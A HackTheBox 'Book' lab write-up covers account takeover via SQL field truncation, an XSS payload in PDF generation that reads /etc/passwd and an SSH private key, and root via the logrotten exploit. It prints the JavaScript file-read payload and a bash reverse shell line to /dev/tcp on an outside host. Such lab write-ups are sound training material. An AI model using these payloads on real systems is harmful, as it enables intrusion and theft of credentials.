14. HackTheBox. Level Medium: Passing Book. XSS to LFI via PDF and LPE via Logrotate

17 December 2024 6 minutes Author: Lady Liberty

We take a detailed look at the HackTheBox Book task. The focus is on XSS vulnerabilities and their escalation to LFI via PDF, as well as privilege escalation (LPE) using Logrotate. The material contains a step-by-step analysis of the attack process: from detecting cross-site scripting (XSS) to further exploiting vulnerabilities for local file inclusion (LFI). In addition, the method of privilege escalation due to incorrect Logrotate configuration is described. This article will be useful for cybersecurity professionals, pentesters, and anyone interested in security vulnerabilities and HackTheBox training tasks. It will help to understand the complex processes of exploitation with real-world examples and steps.

Step-by-step instructions

This article discusses exploiting XSS vulnerabilities to LFI via PDF, privilege escalation using logrotten, and analyzing logging issues caused by field truncation.

The lab is connected via VPN. For security reasons, it is not recommended to use a work computer or device with sensitive data, as the connection is to a private network where experienced information security professionals are present.

Recon

This machine has the IP address 10.10.10.176, which we add to /etc/hosts.

10.10.10.176	book.htb

First, a scan of open ports is performed. To speed up the process, masscan is used instead of the lengthy nmap scan. The scan covers all TCP and UDP ports via the tun0 interface at a rate of 500 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.176     --rate=500

Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.

nmap -A book.htb -p22,80

The host is running SSH and a web server. Let’s start with the Internet. We are greeted by an authorization and registration page.

Let’s register and log in.

The site is a library with the ability to add a book and contact the administrator.

No attack vectors were found in these fields, but the administrator’s email is known. For further investigation, a directory crawl is performed using gobuster. The tool parameters specify the number of threads (128, -t), the target URL (-u), the dictionary to crawl (-w), and the required file extensions (-x).

gobuster dir -t 128 -u http://book.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php

As a result of the search, a number of interesting pages were identified, including the administrative panel. After that, the authorization form was analyzed, and potentially interesting information was discovered in the page source code.

Usernames are limited to 10 characters and email addresses are limited to 20 characters. However, the check is only performed for empty fields and the length of the data is not controlled.

Entry Point

There is a possibility that the entered data will be truncated to the specified length on the server. To check this, a user registers with an email address that is longer than 20 characters.

Авторизуємося з урахуванням урізаної адреси.

As expected, the assumption turned out to be correct. The user with the email address “[email protected] 123” is successfully registered. Then, the system is logged in, which allows you to log in as a regular administrator.

This attack was made possible because when checking the value “[email protected] 123”, the system does not find it in the database, after which the entered value is truncated and overwrites the existing record. After a successful login, the site is scanned, but nothing interesting was found except for the collection.

After downloading and opening PDF documents, we will find a list of registered users and collections.

USER

Experience suggests that when information is uploaded to a server and displayed in a PDF, it is worth checking for the possibility of an XSS to LFI attack. This can be tested by uploading the following code to the server:

<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>

Let’s log in as a regular user and add a file to the collection, specifying this payload in all fields.

Now we download the file with the collection from the administrator, and find the contents of the /etc/passwd file there.

Let’s read the private SSH key of the reader user by specifying the file “file:///home/reader/.ssh/id_rsa” in the payload.

When copying the key from a PDF file, it appears to be incomplete. To resolve this issue, open the file in a browser, then manually copy the key text and paste it into a regular text file. Be sure to highlight the first and last lines of the key.

Let’s assign permissions to this file.

chmod 0600 reader.key

And we connect via SSH.

ROOT

There is a backups folder in the user’s home directory.

These actions did not bring any results. After running the basic system enumeration scripts, nothing useful can be found either. In such a situation, you should check the tasks running on the system using pspy64. During analysis, it turns out that logrotate is running with root user rights.

The Logrotate utility is used to automate log processing, allowing various actions to be performed based on specified conditions and rules. For example, logs can be compressed into an archive, deleted, or sent to another server after reaching a certain size, age, or other parameters.

A Google search immediately yields useful information about potential vulnerabilities and exploits in Logrotate, especially when run as root.

We download the repository and compile the program.

gcc -o logrotten logrotten.c

Now let’s create a file with a reverse shell.

echo "bash -i >& /dev/tcp/10.10.15.60/4321 0>&1" > payloadfile

Logrotten is launched, and another terminal window writes data to the target log file. This allows the Logrotate utility to process the logs, which is executed with root privileges, opening the possibility for further exploitation of the vulnerability.

./logrotten -p ./payloadfile /home/reader/backups/access.log

The program worked successfully.

After a few seconds, a connection appears and lasts long enough for further actions. This time is more than enough to access the private SSH key and view its contents.

Using the obtained private SSH key, a connection is made to the target system. After successful authentication, all that remains is to find and remove the flag.

Conclusion

This article demonstrated a step-by-step exploitation of vulnerabilities, from XSS to LFI via PDF, to gaining access to the system via privilege escalation using Logrotate. The key steps were: discovering logging restrictions, successfully exploiting vulnerabilities to read a private SSH key, and analyzing automated system tasks using pspy64. This allowed access to the system and the final flag to be taken.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.